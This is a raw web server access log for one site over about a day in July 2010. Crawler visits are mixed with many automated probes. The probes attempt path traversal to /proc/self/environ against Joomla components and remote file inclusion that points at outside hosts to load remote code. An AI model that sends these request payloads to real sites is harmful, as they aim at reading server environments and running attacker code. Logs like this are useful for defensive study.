202.181.196.11 - - [12/Jul/2010:23:45:16 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "virtualsupplynet.com"
129.97.219.71 - - [12/Jul/2010:23:48:45 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
212.174.28.46 - - [12/Jul/2010:23:53:12 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [12/Jul/2010:23:53:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [12/Jul/2010:23:53:12 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:58:37 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:58:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [12/Jul/2010:23:58:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:03:56 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:40 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:41 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:42 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:54 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:54 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:07:56 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:10:30 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:10:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:10:30 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:11:25 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:11:29 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:11:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:11:30 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:00:12:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:00:12:01 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:00:12:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:12:27 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:00:12:51 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:18:40 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:18:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:18:41 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:00:21:08 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
200.63.98.40 - - [13/Jul/2010:00:22:35 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:00:54:54 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:01:29:00 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
95.108.150.235 - - [13/Jul/2010:01:52:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [13/Jul/2010:01:52:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [13/Jul/2010:01:52:56 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [13/Jul/2010:01:52:56 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [13/Jul/2010:01:52:57 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [13/Jul/2010:01:53:00 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:25:49 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:25:52 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:25:59 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:02:39:11 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "www.virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:48:21 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:48:31 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:48:31 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
212.174.28.46 - - [13/Jul/2010:02:48:56 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:03:15:14 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
207.46.13.53 - - [13/Jul/2010:03:15:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:03:52:19 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
87.238.162.205 - - [13/Jul/2010:04:02:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.virtualsupplynet.com"
66.182.192.48 - - [13/Jul/2010:04:20:01 -0700] "GET /index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:04:32:06 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
94.23.215.207 - - [13/Jul/2010:04:41:42 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
218.145.71.241 - - [13/Jul/2010:04:43:43 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
94.23.215.207 - - [13/Jul/2010:04:47:31 -0700] "GET /logs/access_100619.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
94.23.215.207 - - [13/Jul/2010:04:47:31 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
94.23.215.207 - - [13/Jul/2010:04:47:32 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "virtualsupplynet.com"
207.46.13.53 - - [13/Jul/2010:04:48:24 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
218.145.71.241 - - [13/Jul/2010:04:58:35 -0700] "GET /logs/access_100619.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
218.145.71.241 - - [13/Jul/2010:04:58:36 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
218.145.71.241 - - [13/Jul/2010:04:58:36 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.156.70 - - [13/Jul/2010:05:02:27 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.virtualsupplynet.com"
72.55.156.70 - - [13/Jul/2010:05:02:27 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:05:13:27 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
72.55.156.70 - - [13/Jul/2010:05:55:55 -0700] "GET /logs/access_100703.log//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
72.55.156.70 - - [13/Jul/2010:05:55:55 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
72.55.156.70 - - [13/Jul/2010:05:55:55 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:05:56:14 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
72.55.156.70 - - [13/Jul/2010:05:59:22 -0700] "GET /logs/access_100619.log//errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
208.80.193.39 - - [13/Jul/2010:06:08:46 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322; PeoplePal 3.0; Comcast)" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:06:39:01 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "www.virtualsupplynet.com"
207.46.13.46 - - [13/Jul/2010:06:40:55 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
87.238.162.205 - - [13/Jul/2010:06:42:21 -0700] "POST /logs/access_100206.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.virtualsupplynet.com"
87.238.162.205 - - [13/Jul/2010:06:42:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.virtualsupplynet.com"
87.238.162.205 - - [13/Jul/2010:06:42:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.virtualsupplynet.com"
77.93.75.79 - - [13/Jul/2010:07:31:40 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.93.75.79 - - [13/Jul/2010:07:31:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
77.93.75.79 - - [13/Jul/2010:07:31:40 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
65.23.129.32 - - [13/Jul/2010:07:44:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://enitec.co.jp/home/community/download/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
65.23.129.32 - - [13/Jul/2010:07:44:22 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://enitec.co.jp/home/community/download/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
65.23.129.32 - - [13/Jul/2010:07:44:22 -0700] "GET /logs/access_100522.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://enitec.co.jp/home/community/download/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:08:12:56 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
67.195.115.249 - - [13/Jul/2010:08:53:20 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [13/Jul/2010:08:53:20 -0700] "GET /logs/access_100213.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:09:00:56 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
209.59.148.167 - - [13/Jul/2010:09:08:39 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
209.59.148.167 - - [13/Jul/2010:09:34:12 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
209.59.148.167 - - [13/Jul/2010:09:34:12 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
209.59.148.167 - - [13/Jul/2010:09:34:12 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:09:52:20 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:10:43:30 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
78.140.138.39 - - [13/Jul/2010:11:10:44 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "www.virtualsupplynet.com"
77.88.31.246 - - [13/Jul/2010:11:32:05 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:11:37:55 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:12:37:05 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
67.195.110.174 - - [13/Jul/2010:12:49:33 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [13/Jul/2010:12:49:33 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [13/Jul/2010:12:51:22 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:13:38:23 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:14:45:03 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.virtualsupplynet.com"
77.88.31.246 - - [13/Jul/2010:15:02:52 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:15:56:38 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
88.250.57.232 - - [13/Jul/2010:16:37:12 -0700] "GET /logs/access_100712.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:17:14:35 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "www.virtualsupplynet.com"
129.97.219.71 - - [13/Jul/2010:18:44:35 -0700] "HEAD /logs/access_100522.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "www.virtualsupplynet.com"
77.88.31.246 - - [13/Jul/2010:19:07:57 -0700] "GET /logs/access_100213.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
193.47.80.41 - - [13/Jul/2010:19:25:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [13/Jul/2010:19:25:51 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [13/Jul/2010:19:36:26 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [13/Jul/2010:19:36:29 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
200.62.70.85 - - [13/Jul/2010:21:39:39 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 75311 "http://www.google.com.ni/search?q=index.php%3Foption%3Dcom_sef%26Itemid%3D%26mosConfig.absolute.path%3D&hl=es&ei=WT89TN6hCsG88gaQk82TBQ&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.virtualsupplynet.com"
200.62.70.85 - - [13/Jul/2010:21:39:40 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.virtualsupplynet.com"
